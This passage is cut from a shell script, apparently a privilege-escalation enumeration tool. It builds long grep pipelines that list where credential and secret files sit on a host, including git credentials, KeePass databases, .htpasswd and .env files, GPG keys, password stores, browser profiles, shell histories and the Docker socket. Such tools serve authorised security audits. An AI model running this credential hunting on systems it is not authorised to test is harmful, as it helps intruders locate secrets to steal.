"$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '/lib' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E 'README.gnupg' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*_history.*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.psk$" | sort | uniq | head -n 70) - PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.password-store$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/etc|^/usr" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E 